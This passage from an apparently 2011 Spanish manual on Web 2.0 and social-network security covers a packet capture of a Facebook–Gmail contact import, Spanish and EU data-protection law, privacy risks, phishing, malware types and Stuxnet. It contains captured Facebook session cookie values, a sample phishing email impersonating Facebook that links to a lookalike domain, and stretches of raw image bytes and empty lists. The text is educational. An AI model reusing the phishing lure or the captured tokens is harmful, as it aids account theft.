lo=PtYu_jC7QvQuVijSZcGUhg; locale=es_ES; lsd=7wRed; x-
referer=https%3A%2F%2Ffanyv88.com%3A443%2Fhttp%2Fwww.facebook.com%2F%3Fref%3Dhome%23%2F%3Fref%3Dhome;
xs=2a848faa616da4523674801c8ee2a4faConnection: keep-alive
Página 228
Aspectos de seguridad en Web 2.0 y redes 2011
sociales
.PNG.
...IHDR..............wS.....IDATx.b...?............cvB....IEND.B`.
.PNG.
...IHDR...2...........~...
.IDATx.T.i.d.}..;......Vfe.]U.T.$EI.EJ$%....c.....r..{.......1...<.f03.....\Dv.....}.=3.......Q.
q...@F.=....<........h8...`......:;[]:......A..9:<..lr..m.|J.K..2k......G....=.._...![+k..n.._~.
lV..y.....[...{x..\..ko|..8..lq||.-
Ji.o.g4..n......H........@{.Gk.s.0.Q.z..+Z.:o..C..Dk...s8g.}...n..y.ng...>cs.K.-
.}....1..,5..&.t.
|_3....d}u.,....3...;lllp.......EZ......!$8pn.;..@.^.~.F.."...................3k..}.O...).N.....
{.......4.!....^.3..8=..e%By8)x..K..O.......]..>..."..E...bo.1[.g.I........A..C...!..
.D.PW_:..Y..R.....N......bB.xtZM.l...,I...(....%#...'7)M...).Y.....
..3O.NG..........F4.m..!.......~DQd.......&9Q.!.Ha..s.)...@[email protected]..)..Z9.0H....<~..Z..i79...b>b}..
.........MG....n.#...*..P...._.....F.O`p*(....6/..9.....'8
<.1.2.NY_;..
.<..g....0P...'.9t.%4.MJ."...<.......sN..@X<....Mf...<:...E.....yBQ:"..0s...Gwo3.,.F....{(-
.>......^...o..?....}r..W...q..e<......U[(M.R
!.=.......8..$iF..
.B.]..C.r..)..S.......1.kk..C.....YB?a2K)...'3.?9b._`...5...q.....8...]..............>$.B...!0..
.h.R.....).N..6.*.Z.P...m...q...F......v.1.$OH...QF..#.#f...g.0...-
rNNgL.)G..|z.>.(...,[P..J.b2.b.Y........S.....~.K.....k$ZI...s..?dk{.OFXgq8@...!q....4O.....^.3.
.Q.f0.`......X...wo......e...wI.%Rw........?..E.C..V."E.q%......J4B(....gs....W_z...\..,........
P...J|]..#!+s...d.^$S..!a.Q.#....o(....;w......h..y.$..$..:...rxp.t4..7i.Z.:@
A.^C*.X.p8!I...<%IK2c..h.....k...._i6...DK.T.f...>.yB.....c.....)'.c.\p.........^.k-
.z......Z;|....1..88.S.%..]...!......=!.9.7...w..k._`m..j.A....k..i.......i6....P..B......).....
[email protected].*...(...d.....].........h#.
..<_.y.;..%..)yn..M.....4M..&..3.|...s.......W..%F..h..|A.+B_.)...+..i|-
.|.ZT#....0.9:......."...x.'Lf..........F.G.eA.e...y.'?C..F.7.I.....j.(.PZ`m.....a0.st|.V>..x...
`....2.9....d4.,K.s(....(
.}.@)|..V...F.........LgC....#..2..C...|...M...Z#'.Ox.{...'..m..8......Z+.,.4.BZ..cR.=.O\.1...O.
...G..>.....=.l...................MVw?
jh..:.1X.HEf....E..i.hz...k4....]...!-.....c..1y.0.M..f....9..%...I:'.4...u..!
....T1[:..I.9.z..h......t........!MS.RH..B.....Zk.Rh..B.+...h.$..i..e..>..x<emm..`...1.}r...]&.S
j.B.G..q.._q..*Z).|..GYZz+..(.2.....m~.._`o...~.1.^~.......X..VL'c<$%.y....!........T1Uy.eK.1..B
_.)Y,..B....q2:......i..'.9wv...-
vvvx....n.7...NO..6C/..q...U.3...BX_[.............l...g..|.1.4].{.X.....%..
..,J..!...QJ0JP.....<..f..C..A.8./.....G4.5<.qn'...>$IS.....!..!'.>V.v...j.X[..S:.U..<~.._....>.
.!..>....Q..
...Q.j'%yQR.cli...RJ.........tA.XP."..D+.zTc........8..N2f..ka..*w.?b6....CJ....f<.2.......<....
......z.0.99>....;z.h2d.,...H.4.!A.QA.x..`...!.\[g..Yt..C..O.....9:9!.#<...b..B..........w...<#.
C...<.........|..m........H..g.....}...e.Q..|.p.?......z..<...)5.,i5b._R....#F..Zk....)A.......S
....b..@..$.?.0...qf.v....M..).@Q.|..g6......_...F..t..>.[.>>a0.S..)<C.Uc.X.juX[...........qx8..
......z.krZ...|.|....4[m.0.Z..{...[os..=.........<s.4M...t.].,!...t.|...Y..y...[.k...S>.......k[
|..]..?../.......?.u...+.<...^...{h...._...1.......3_d,..*..0:.ptp........EN.f..]6........c....z
..uv.<a...(rV.mp%i2......m.][email protected]>>F.>EV.....O..O.ku>..S.?b8............rA........k.]&..E9c8.
P....Q.)..j:.p..f..Yo...U...E.k5...8.x..K.=y.....<.....B.zm.-
.....5z..e....F.z(OQ....#....8.....y.1.'.y.....z6..i.X_....B.......&.1:[email protected]%.4
Página 229
Aspectos de seguridad en Web 2.0 y redes 2011
sociales
....e.e..e....n.I...r....O...... f.X......U.........
G....s..&2.q:.S.....?.cR[..
J../..(.....eQ..3.,a6....E...LFs:..5O.........dA..(..W......Z......u.(.(
V.]....m....n.E\.U....(....$K.%.....K.t.`.....\GJ...e/..M..^/.,=..........a..s..}f..Y^R....J....
.......B..#P1.f.-$J(..BB..:........%..n.Z-$MS.-
..9.......U..t:.......(1B.]......!Q4.m....A*.......74.'{,..E...[c}.,..CZ..k.+ll......;.F{....+..
SZ.?.'......4..R..)RJ.s..sF..B-{p..<.. ..7....O....:-
P.$.3.M....a..tL...u..sY.xx..Z.|...gw..Jz<y|...).M\.3..h.CB_......lV....#...l'...YNN..y.<.c.....
[:(.y.s...V.P..i2S2.Nx....NY.9.)QZ#.$.4...q(..pH..H..AJ.y..?..Z.X.9N.).EQ&..O.....}<-
.{|...s....H........YU.E.:.Z.0..
li...e...FO..I
R`.d...o.M)-
FB..(.C.0.%H.Nj...%Z.dYF...8..y..YA....z._....?9....N.$.........vWP.......)%.+..f2...(%H..$.h6..
.9....(_a....Rbq....V.S.y2'....
.x.G...J<.....5.M..m1/h..X[A...*.}..)5.f.Vs.'...BP.%Q.f<....e...tk..l.jw.......).....^aeu.....{.
.NO....llm...B.......G.g8%Q..I&..,....VM.3..D.U..B...u.|..V>aX.Y...1'...G3.Tdy.............3..QU
....`.).F..)...A.b..k............)...x~....,)
CV.Xk1Bp....5......AHQ...@*.t.B..E).|1.z."..G.....a....k.
.r.....1....'=&....I.X.f}...f...Bm.G...`1..y..n..]..@*.3.<3...+K.0.....d6.Ro..O..Q.......z.'.).q
9Q........5..c.-.....u.sH..'8,.......oY[[#.C.4.9....|.t.#....NP....W.3..@.%
.P..y..ey.BWD..Pm./.MS.....S..PZ3...G.%9.f.g.EQ
.<e2.1..0.."%,.3.s|.[.A.M.6X]]....[.[x.O..fkg.?..yF.....qRV.Q*t...A...a...`.&,.3.M.|G-
.Z.._x......Q.g8.S....(e.|MQTW..x.G.._....I.\..C.p...........N.Ra]A..)M...*Jz..-
..rttD...X..N'.?s.....h5.....h...$U...)I2.,s..'.#@.......j..G..x...@.....,...-..Y
SE..|.ZY...X.<w. ...3.E..Oo.m.p..5....N."/x...QTC.Z.....v...DX...M..1.T.&."....t1g..Y$..-
....G4.M..EZ2..t{.......7.Z...R:.3.yF...'3..1+...V.V.M.....z........K./.......(
.]>...0f<..e.......5z....Ox...3<.b.`..W.X.h..MY.W..a.$[.i6.Xc.R.E..
E...>..3.x..6i....,.W..R.qTm..p."..9.9.
Como vemos las conexiones que se producen entre nuestro host local y los servidores de
Facebook y Gmail son conexiones de tipo TCP para establecer la comunicación de manera
segura como lo hace este protocolo, de tipo TLS para el intercambio de información segura a
nivel de transporte y del tipo HTTP para solicitudes GET y POST al servidor. Si analizamos las
conexiones HTTP, la mayoría de peticiones GET y POST que vemos son para obtener la
importación de contactos, algunos paquetes de datos transmiten imágenes de tipo .png,
otros son simplemente aceptaciones del servidor del tipo HTTP 200 ok.
A nivel de seguridad, viendo las cabeceras de las solicitudes de HTTP, si un atacante malicioso
capturase las conexiones dentro de nuestra red podría darse cuenta de que estamos haciendo
una importación de contacto de Facebook a Gmail que es un paso delicado, pero al ir todas las
conexiones con claves cifradas mediante TLS es bastante difícil, por no decir, casi imposible
que obtuviese nuestra clave de esta manera.
Este tipo de importación de contactos entre Web 2.0 sólo se realiza una vez y no se repite a
menos que el usuario lo desee. Una vez que Facebook tiene los contactos de Gmail
importados, los almacena en su base de datos y no se vuelve a comunicar con Gmail para
nada, por lo que Facebook no guarda de ninguna manera nuestra contraseña de Gmail.
Página 230
Aspectos de seguridad en Web 2.0 y redes 2011
sociales
Capítulo 13
Legislación, estándares y
normativas
13.1. Introducción
Vamos a ver las normativas oficiales del gobierno de España y de la Unión Europea referentes
a las redes sociales y a la Web 2.0.
A pesar de las políticas tan restrictivas que podemos ver en los términos de uso de
determinadas redes sociales, tenemos algunas organizaciones a nivel nacional que nos
respaldan en el caso de sufrir algún delito de protección de datos o similar.
En este apartado no vamos a tratar de describir ley a ley los documentos si no que veremos su
enfoque hacia las redes sociales, cómo nos pueden proteger frente a problemas que surjan
derivados del uso de estas redes.
Las redes sociales se ven afectadas de manera jurídica por tres ramas principalmente:
Privacidad.
Propiedad Intelectual e Industrial.
Consumidores o usuarios.
Las redes sociales permiten la inserción de datos de información (datos de carácter personal,
datos de contacto, religión, política, tendencias sexuales, gustos, imágenes y video), cesión de
los datos y borrado y retención.
También debemos destacar las series ISO 27000, que se trata de estándares de seguridad
para las mejores prácticas en Seguridad de la Información. Estas muestran cómo desarrollar,
implementar y mantener especificaciones para los sistemas de gestión de la información o
SGSI’s. Recorren muchos ámbitos.
Página 231
Aspectos de seguridad en Web 2.0 y redes 2011
sociales
Tras llevar varios años la LOPD implantada el gobierno desarrolló el Esquema Nacional de
Seguridad o ENS. Ésta trata de establecer la política de seguridad en el uso de medios
electrónicos en las administraciones públicas estableciendo unos principios básicos y unos
requisitos mínimos. Así a priori no parece afectar a las redes sociales, pero en un futuro, si el
ENS se ve que funciona y se traslada al ámbito de las empresas privadas, podría tener
aplicación en las redes sociales.
Página 232
Aspectos de seguridad en Web 2.0 y redes 2011
sociales
DOCUMENTOS
Vamos a ver os documentos legales de los que disponemos referentes al ámbito de la Web
2.0. Algunas de estas leyes continúan en vigor y otras han sido derogadas.
ISO 27000
o Las normas ISO 27001 son estándares de seguridad. Destaca su versión
ISO/IEC 27001 que es la certificación que adquieren las organizaciones,
estándar para la seguridad de la información. Especifica los requisitos de
implantación SGSI (Sistema de Gestión de la Seguridad de la Información).
o Estas normas están redactadas por:
International Organization for Standardization (ISO).
International Electrotechnical Commission (IEC).
o Documentación: http://www.27000.org/.
UIT-T X.805
o Esta metodología hace un examen a alto nivel de los entornos complejos de
red, servicios y aplicaciones en el plano tecnológico.
o Redactada por Telecommunication Standardization Sector (ITU-T).dentro de la
Unión Internacional de las comunicaciones (ITU). Antiguamente se conocía
como Comité Consultivo Internacional Telegráfico y Telefónico (CCITT).
o Documentación: http://www.itu.int/itudoc/itu-
t/aap/sg17aap/history/x805/index.html.
Página 233
Aspectos de seguridad en Web 2.0 y redes 2011
sociales
Página 234
Aspectos de seguridad en Web 2.0 y redes 2011
sociales
o Documentación: http://noticias.juridicas.com/base_datos/Privado/l17-
2001.t1.html#a1.
Directiva 91/250/CEE, de 14 de mayo de 1991, del Consejo sobre la protección jurídica
de los programas de ordenador.
o Ésta ley está redactada por el Consejo de las Comunidades Europeas.
o Documentación: http://www.scribd.com/doc/262649/Directiva-del-Consejo-
91250CEE-sobre-la-proteccion-juridica-de-programas-de-ordenador.
Directiva 2001/29/CE, de 22 de mayo de 2001, del Parlamento Europeo y del Consejo.
Derechos de autor.
o Armonización de determinados aspectos de los derechos de autor y derechos
afines a los derechos de autor en la sociedad de la información.
o Ésta ley está redactada por el Consejo de las Comunidades Europeas.
o Documentación: http://eur-
lex.europa.eu/smartapi/cgi/sga_doc?smartapi!celexapi!prod!CELEXnumdoc&l
g=es&numdoc=32001L0029&model=guichett.
Propuesta de Directiva de la Comisión Europea sobre Copyright en la Sociedad de
la Información (10 de diciembre de 1997).
o El objetivo de esta propuesta se centra en los derechos de reproducción,
comunicación pública, distribución y protección legal de los sistemas anti-
copia, así como de la gestión de los derechos.
o Esta propuesta ha sido redactada por la Comisión Europea.
o Documentación: http://www.onnet.es/01005008.htm.
Informe Bangemann.
o El Consejo Europeo solicitó que un grupo de personalidades elaborase un
informe para su reunión de 24- 25 de junio de 1994 en Corfú sobre las medidas
específicas que deben estudiar la Comunidad y los Estados miembros para el
establecimiento de infraestructuras en el ámbito de la información.
o Este informe ha sido redactada por la Consejo Europeo.
o Documentación: http://www.scribd.com/doc/29054214/Informe-Bangemann.
Libro Verde CEE sobre el derecho de autor en la Sociedad de la Información.
o El presente Libro Verde trata, por una parte, las excepciones y limitaciones de
los derechos exclusivos previstas porla Directiva 2001/29/CE y la Directiva
96/9/CE, y por otra, los problemas específicos, relacionados con las
excepciones y limitaciones, que afectan sobre todo a la difusión de
conocimientos, y que plantean la conveniencia de que estas excepciones
evolucionen en la era de la difusión digital.
o Este libro ha sido redactada por la Comisión Europea.
o Documentación:
http://www.isciii.es/htdocs/internacionales/pdf/Libro_verde_CE_derechos_de
_autor_en_la_economIa_del_conocimiento.pdf.
G7 and the Global Information Infrastructure.
o Redactada por los países del G7.
o Documentación: http://www.oecd.org/dataoecd/50/7/1912224.pdf.
Página 235
Aspectos de seguridad en Web 2.0 y redes 2011
sociales
Página 236
Aspectos de seguridad en Web 2.0 y redes 2011
sociales
Página 237
Aspectos de seguridad en Web 2.0 y redes 2011
sociales
o Documentación:
http://www.belt.es/legislacion/vigente/Seg_inf/Comercio%20Electr%C3%B3n
ico/pdf/dir_97_7.pdf.
Documentos referentes a nombres de dominio:
Orden 21 marzo 2000. Regula el sistema de asignación de nombres de dominio de
Internet bajo el código de país correspondiente a España (.es).
Leyes relativas a pago electrónico y TEF (Transferencia Electrónica de Fondos):
Directiva 2000/46/CE, de 18 septiembre 2000, del Parlamento Europeo y del
Consejo. Acceso a la actividad de las entidades de dinero electrónico y su ejercicio así
como la supervisión cautelar de dichas entidades.
o Redactada por el parlamento europeo.
o Documentación:
http://europa.eu/legislation_summaries/other/l24236_es.htm.
Página 238
Aspectos de seguridad en Web 2.0 y redes 2011
sociales
INSTITUCIONES Y ORGANIZACIONES
Como instituciones podemos destacar:
Asociaciones:
Página 239
Aspectos de seguridad en Web 2.0 y redes 2011
sociales
13.2. Leyes
13.2.1.LOPD
13.2.1.1.Introducción
La Ley Orgánica 15/1999 de 13 de diciembre de Protección de Datos de Carácter Personal
o LOPD, se trata de una Ley Orgánica de España relativa al tratamiento de los datos de
carácter personal, libertades públicas y derechos fundamentales de las personas físicas.
Podemos encontrar la ley en la página Web de Boletines Oficiales del Estado o BOE,
http://www.boe.es/aeboe/consultas/bases_datos/doc.php?coleccion=iberlex&id=1999/23750.
La ley comprende un total de 49 artículos divididos en los siguientes 7 Títulos. Finaliza con seis
disposiciones adicionales, tres disposiciones transitorias, una disposición derogatoria y tres
disposiciones finales:
Los datos personales se clasifican según su mayor o menos grado de sensibilidad. Según el
grado de sensibilidad, los datos requerirán o no más requisitos legales y medidas de seguridad
de la información.
Las sanciones que se imponen por no cumplir con la LOPD son muy elevadas, van desde:
A pesar de esto hay muchas empresas en nuestro país que no se han adecuado a la ley. El
órgano que se encarga del cumplimiento de esta ley es la Agencia Española de Protección de
Datos (AEPD), existiendo agencias autonómicas también.
Todas las redes sociales, incluidas las extranjeras, deben cumplir esta ley si operan en el
ámbito español.
Página 240
Aspectos de seguridad en Web 2.0 y redes 2011
sociales
Quien pretenda transmitir datos de carácter personal fuera de España hacia países que no
proporcionen un nivel de protección equiparable al que presta la LOPD debe obtener la
autorización previa del Director de la Agencia de Protección de Datos. Los países que
proporcionan un nivel de protección equiparable a la LOPD son todos los que forman el
Espacio Económico Europeo (Unión Europea, Islandia, Lechtenstein y Noruega) y los que
la Comisión Europea ha declarado que garantizan un nivel de protección adecuado que son
Suiza, Argentina, Guernsey, Isla de Man, Estados Unidos y Canadá.
En caso de que una empresa o profesional quiera adecuar su sitio Web a lo dispuesto en la
LOPD, el trabajo a realizar sería el siguiente:
Casi todos los sitios Web, especialmente los que trabajan con Bases de Datos (MySQL o
similar) mantienen en la Web de forma permanente una serie de ficheros (clientes,
suscriptores, personas registradas, etc.) a fin de poder atenderles y facilitarles acceso a zonas
privadas, o determinados servicios, cualquiera que sea la hora o el día en que entren en la
54
Referencia: http://www.consultores-ebusiness.com/index.php/web-20/164-adecuacion-de-sitios-web-a-la-lopd.html.
Página 241
Aspectos de seguridad en Web 2.0 y redes 2011
sociales
Web. Y esos ficheros, como es lógico, almacenan datos de carácter personal, por lo que es
obligado darles el tratamiento que establece la LOPD.
Es importante hacer constar que sólo es necesario dar de alta la existencia de los ficheros,
pero no los datos que contienen, los cuales siempre permanecen en poder y conocimiento
exclusivo del Cliente.
Para evitar sanciones por esta práctica, redactaremos los contratos que es obligatorio
suscribir entre las partes para amparar legalmente este tipo de cesiones de datos a otras
empresas, como las citadas anteriormente.
Es necesario destacar que el nuevo RLOPD establece la necesidad de que la empresa que
pretende contratar servicios externos que implican la cesión o el acceso a datos personales
deba, previamente, constatar que la empresa de servicios cumple con todas las obligaciones
derivadas de la LOPD, ya que en caso contrario no debe contratar con ella para evitar
sanciones.
También redactamos las notas legales que deben incorporarse en todos los lugares y
momentos donde se vaya a recoger información de carácter personal (formularios de
contacto en la Web, formularios de pedido en las tiendas virtuales, etc.).
Página 242
Aspectos de seguridad en Web 2.0 y redes 2011
sociales
13.2.2. LSSI
13.2.2.1. Introducción
La Ley 34/2002 de 11 de julio de Servicios de la Sociedad de la Información y Comercio
Electrónico o LSSI (también llamada LSSICE). Más conocida como Ley de Servicios de la
Sociedad de la Información.
Esta ley se encarga de la regulación del régimen jurídico de los servicios de la sociedad de la
información y contrataciones electrónicas.
Página 243
Aspectos de seguridad en Web 2.0 y redes 2011
sociales
Página 244
Aspectos de seguridad en Web 2.0 y redes 2011
sociales
55
Referencia: http://www.redycomercio.com/servicios_adaptacion_Web_lopd.php
Página 245
Aspectos de seguridad en Web 2.0 y redes 2011
sociales
En algunos sectores de las TI dentro de la competencia del UIT-T, se preparan las normas
necesarias colaborando con ISO y CEI.
Las normas UIT-T o ITU-T (en inglés) son “Recomendaciones” gozando de un gran
reconocimiento internacional al pertenecer la UIT a la ONU56.
No nos proporciona una metodología para abordar soluciones a problemas si no que nos da
las guías para la implantación de sistemas de protección en entornos multi-elemento y
multi-tecnologías muy complejos.
56
Referencia: http://www.borrmart.es/articulo_redseguridad.php?id=368&numero=16
Página 246
Aspectos de seguridad en Web 2.0 y redes 2011
sociales
Capítulo 14
Privacidad
14.1. Introducción
En las redes sociales no existe la privacidad, en cuanto nos hacemos un perfil en una red social
cedemos nuestros datos personales a la Web y todo lo que colguemos en la red será de
dominio público, por ello hay que ser cautelosos a la hora de subir información de carácter
personal a este tipo de Webs 2.0.
Las redes sociales son muy ventajosas para todos, cada vez más y más internautas se unen a
ellas. En España en concreto, unos 13 millones de usuarios visitan como mínimo una red social
todos los meses. Somos el segundo país en Europa, tras Reino Unido en uso de redes sociales.
Las redes sociales más exitosas de nuestro país son Facebook, Tuenti y Myspace.
Las redes sociales traen ventajas pero también surgen con ellas nuevos problemas de
privacidad y de seguridad tanto a nivel informática como física. Los usuarios crean su propio
perfil incluyendo todo tipo de información personal. Estos usuarios se conectan con el resto
de gente en la red social. Los usuarios pueden controlar quién ve su información en la red
social, pero si indagamos en los términos de uso de redes sociales, veremos que al crear la red
social estamos otorgando la propiedad exclusiva y perpetua de toda la información que
incluyamos en nuestro perfil a la red social y que ésta puede transferirla a terceros sin nuestro
permiso. Si deseáramos eliminar nuestro perfil, no se hace de manera inmediata, si no que
puede permanecer en los servidores de la red el tiempo que ellos deseen.
El principal problema que surge con las redes sociales es el uso de datos de carácter personal
por parte de la red social y de terceros.
Otro debate importante en el tema de la privacidad 2.0 son las cookies. Los sitios Web y
navegadores almacenan datos de los usuarios con el fin de analizar el perfil del consumidor y
ofrecer publicidad on-line.
Página 247
Aspectos de seguridad en Web 2.0 y redes 2011
sociales
Otro de los peligros de las redes sociales es el spam. En el mercado negro se pueden comprar
listados perfiles de Facebook o MySpace con su correo electrónico que las empresas pueden
usar indiscriminadamente para hacer publicidad. En este sentido hay una falta de legislación a
gran escala que debería generarse con los nuevos entornos 2.0.
Veremos todo este tipo de problemas de privacidad que surgen con las Web 2.0.
Algunas personas afirman que las redes sociales son un instrumento de manipulación por
parte de los Gobiernos. Se han dado varios casos donde los Gobiernos han encontrado a
terroristas muy buscados gracias a portales como Facebook. Se ha dado algún caso donde el
Gobierno de EEUU ha encontrado a terroristas de Al Qaeda mediante Facebook. Para ver más
sobre este tema podemos consultar el artículo “Facebook Terrorista: La nueva arma del
Ejército de EEUU” de la Web CubaDebate,
http://www.cubadebate.cu/noticias/2009/08/19/facebook-terrorista-la-nueva-arma-del-
ejercito-de-los-estados-unidos/.
Ejemplo en nuestro país, es el caso de los terroristas de ETA Jon Rosales Palenzuela y Adur
Aristegi Aragón, que aparecen en la red social de Facebook con la camiseta de la selección
española con el perfil totalmente accesible, ¿por qué no agregar a alguien a nuestro perfil que
defiende los colores de la selección? Podemos consultar este artículo para más información
http://www.facebooknoticias.com/2010/02/18/rosales-presunto-terrorista-de-eta-aparece-en-
facebook-con-una-camiseta-de-la-seleccion-de-futbol-espanola/.
Podemos ver el siguiente video relacionado con la privacidad en las redes sociales en
Facebook algo exagerado ya que llega a poner en duda si Facebook “se asemeja a un régimen
totalitario virtual motivado ideológicamente”. Incluso en el video nos dice si “no estamos tan
lejos de la novela de George Orwell llamada 1984, en la que un personaje de carácter
omnipresente lo controla todo”.
Podemos ver el siguiente video referente a la privacidad en Facebook.
Página 248
Aspectos de seguridad en Web 2.0 y redes 2011
sociales
El nivel de ataque puede ir desde un simple amigo al que le hemos dado nuestra contraseña
de Facebook y se mete en nuestro perfil para cotillear hasta ataques más sofisticados como
pueden ser los ataques de phishing.
Vamos a ver algunos de estos ataques de ingeniería social en sus diferentes formas y como se
aplican a la Web 2.0.
Los fraudes por email tienen diferentes objetivos como el robo de contraseñas, números de
cuentas corrientes o tarjetas de crédito.
Página 249
Aspectos de seguridad en Web 2.0 y redes 2011
sociales
Básicamente para ataques 2.0 principalmente nos veremos afectados por el Phishing scam.
Página 250
Aspectos de seguridad en Web 2.0 y redes 2011
sociales
14.2.2. Phishing
El término proviene de fishing o pesca, que haría referencia a hacer que los usuarios piquen en
el anzuelo. Esta técnica de ingeniería social se basa en que el atacante se hace pasar por
alguien de confianza como una empresa o una persona y redirecciona a la víctima a un sitio
Web fraudulento que aparentemente es el sitio oficial de ese portal Web.
Normalmente los links a estos portales fraudulentos se envían o por correo electrónico, lo que
llamábamos antes pishing scam o por mensajería instantánea.
El objetivo de esta técnica es obtener datos de cuentas bancarias de los usuarios o el robo de
contraseñas, normalmente enfocado el ataque a un beneficio económico que obtendrá el
atacante.
Normalmente el pishing más usado es el pishing scam. Los atacantes suelen jugar con el
desconocimiento del usuario. Vamos a ver un ejemplo de ello.
Página 251
Aspectos de seguridad en Web 2.0 y redes 2011
sociales
hora local del Enviado a la(s) 07:14 (GMT-07:00). Hora local del remitente: 10:46 ✆
remitente
El personal de Facebook ha estado investigado las cuentas de los usuarios de Facebook que están
inactivas. Con motivo de evitar los perfiles falsos o inactivos de nuestros usuarios, deseamos conocer si
usted hace uso de su perfil. Para ello accedo a la Web oficial www.facebook.comy notifíquenos sus datos
de nuevo. En caso de no ocurrir esto, se cerrará el perfil en cuestión de un par de semanas.
Gracias,
El equipo de Facebook
Este mensaje estaba destinado a [email protected]. ¿Deseas controlar los mensajes de correo
electrónico que recibes de Facebook? Visita la página de Notificaciones.
Facebook, Inc. P.O. Box 10005, Palo Alto, CA 94303
Página 252
Aspectos de seguridad en Web 2.0 y redes 2011
sociales
Si pasamos el ratón por encima de los vínculos nos damos cuenta de que no van a donde
supuestamente debería llevarnos si no que nos llevan a una Web llamada
www.miperfildefacebookk.com, la cual no da demasiada confianza.
Como vemos una técnica bastante sofisticada que combina ingeniería social con tecnología.
Página 253
Aspectos de seguridad en Web 2.0 y redes 2011
sociales
14.2.3. Malware
Se trata de un programa malicioso que se introduce en una máquina sin el consentimiento del
usuario y con el objetivo de dañar el sistema o extraer datos de manera ilícita.
Virus.
Gusanos.
Troyanos.
Rootkits.
Spyware.
Adware.
Keyloggers
Stealers.
Las vías más comunes de infección de este software son a través de Internet mediante correos
electrónicos o vía web mediantes archivos infectados. Otra vía muy común y peligrosa para las
empresas son los dispositivos USB.
Este tipo de infecciones son muy peligrosas para las empresas porque podemos llegar a tener
un número elevado de botnets o “zombies” y que los administradores de seguridad lo
desconozcan ya que algunos de ellos son indetectables por muchos antivirus. El tener este
tipo de ordenadores infectados o robots informáticos podrían provocar que el atacante
extrajera información sensible o provocar una denegación de servicio (DDoS) y dejar
inhabilitados los servidores de nuestro CPD lo que podría causar graves pérdidas para la
empresa.
Virus y gusanos: son los más extendidos y se trata de programas que infectan el equipo
realizando acciones maliciosas. Puede inutilizar archivos, borrarlos, bloquear funciones del
sistema operativo, etc. Se propagan a través de un ejecutable que puede estar encubierto y se
hace vía e-mail, Web, documentos u otros.
Uno de los gusanos más sonados últimamente es el Stuxnet, conocido a partir de junio de
2010. Se trata de un gusano muy bien hecho que reprograma los sistemas SCADA de control y
monitorización de procesos y que incluye un rootkit para sistemas reprogramables PLC.
Veremos una noticia de esto posteriormente referida con el ataque a las plantas nucleares de
Irán por este gusano.
Troyanos: se trata de software malicioso que se instala en el equipo que se presenta al usuario
como algo legítimo de primeras y al ejecutarlo ocasiona daños en el equipo, normalmente
permite el acceso remoto por parte del atacante al equipo. La diferencia con los virus es que
no se propagan solos a otras máquinas.
Uno de los troyanos que se están extendiendo más últimamente son los del tipo rogueware,
toda una especialidad dentro del malware de hoy en día. Se tratan de troyanos enfocados
principalmente a sistemas Windows que se hacen pasar por un antivirus ficticio. El falso
Página 254
Aspectos de seguridad en Web 2.0 y redes 2011
sociales
antivirus nos dice que estamos infectados y que para desinfectarnos deberemos pagar con
tarjeta de crédito para ello. Algunas de las marcas ficticias son Red Cross", "Peak Protection",
"AntiSpaySafeguard" o "Pest Detector". Podemos ver un ejemplo de estos troyanos realizado
por Hispasec http://www.youtube.com/watch?v=TqVm-BP2X00&feature=related.
Otro tipo de troyano que se empieza a extender es el ransomware, que se trata de un troyano
de criptografía asimétrica para cifrar los archivos de usuario para así pedir un rescate por ellos
mediante PayPal o cualquier servicio postal de giro facilitando el anonimato. En ocasiones los
archivos pueden quedar inservibles.
Rootkits: se trata de una herramienta que tiene el fin de esconderse a sí misma y esconder
procesos, archivos, puertos, claves de registro, etc. Normalmente esconden aplicaciones que
se usan para el ataque de un sistema concreto. Lo peor de este tipo del malware es que
algunos rootkits no solo van a nivel de aplicación si no que también atacan a nivel de kernel
pudiendo llegar a instalarse en la BIOS de nuestro sistema.
Spyware y Adware: quizá este tipo de malware es el que viene más ligado a la Web 2.0. Este
tipo de programas recopilan información sobre las actividades que realiza el usuario a través
de la red para distribuirla por agencias de publicidad u otras empresas. Recogen información
sobre las cookies de usuario, barras de herramientas de los navegadores, historial de
navegación, etc. El Adware muestra publicidad al usuario de manera intrusiva mediante pop-
us que son muy incómodos para el usuario.
Este tipo de malware ha hecho que los bancos y cajas para prevenirse, incluyan un sistema de
logueo por click de ratón o intercambio de números por letras, así nunca se teclearía
directamente la contraseña para loguearse.
Página 255
Aspectos de seguridad en Web 2.0 y redes 2011
sociales
Ilustración 67. Noticia: Planta nuclear en Iran sufre ataque de gusano: http://alt1040.com/2010/09/planta-
nuclear-en-iran-sufre-ataque-de-gusano.
En agosto de 2010 los países más afectados por el ataque fueron Iran, Indonesia, India,
Estados Unidos, Australia, Gran Bretaña, Malasia, Pakistan y Alemania, por ese orden. Se
tiene indicios de que Israel podría estar detrás de este ataque.
Este gusano esta desarrollado para sistemas Windows y emplea hasta cuatro vulnerabilidades
de día cero. Ataca a sistemas SCADA, que se trata de programas de monitorización y control
industrial.
Página 256
Aspectos de seguridad en Web 2.0 y redes 2011
sociales
14.2.4. Contraseñas
Este ataque trata de robar las contraseñas de los usuarios del correo electrónico por ejemplo
engañando de manera ilegal al usuario.
También puede ocurrir que alguien que se hace pasar por un amigo tuyo te pida tu cuenta de
correo por algún programa de mensajería instantánea y pensando que es nuestro amigo se la
demos.
Página 257
Aspectos de seguridad en Web 2.0 y redes 2011
sociales
Los atacantes se valían de un paquete infectado con 30 aplicaciones que se hacía invisible a los
sistemas de seguridad, solo un 10% de ellos lograban detectarlo.
Se encontraron afectadas Webs como PayPal o Ebay y otras como Facebook, Yahoo y
Hotmail así como bancos españoles del grupo Santander entre otros.
Como vemos un gran robo de contraseñas que no deja de poder evitarse si el usuario no
abriera archivos contaminados provenientes adjuntos de correo o páginas sospechosas.
57
Fuente: http://www.neoteo.com.
Página 258
Aspectos de seguridad en Web 2.0 y redes 2011
sociales
El problema es que la información que contienen estas redes sociales acerca de los usuarios y
sus gustos, es información muy golosa para las grandes empresas de publicidad y
comunicación y que se puede conseguir de manera totalmente gratuita si se hace creer al
usuario que se encuentra en un entorno seguro y de privacidad.
Es importante que las condiciones de uso de estos portales sean claras ya que es importante
que las redes sociales hagan una gestión transparente con nuestros datos privados y
principalmente con los que son menores de edad. Veremos a posteriori una serie de páginas
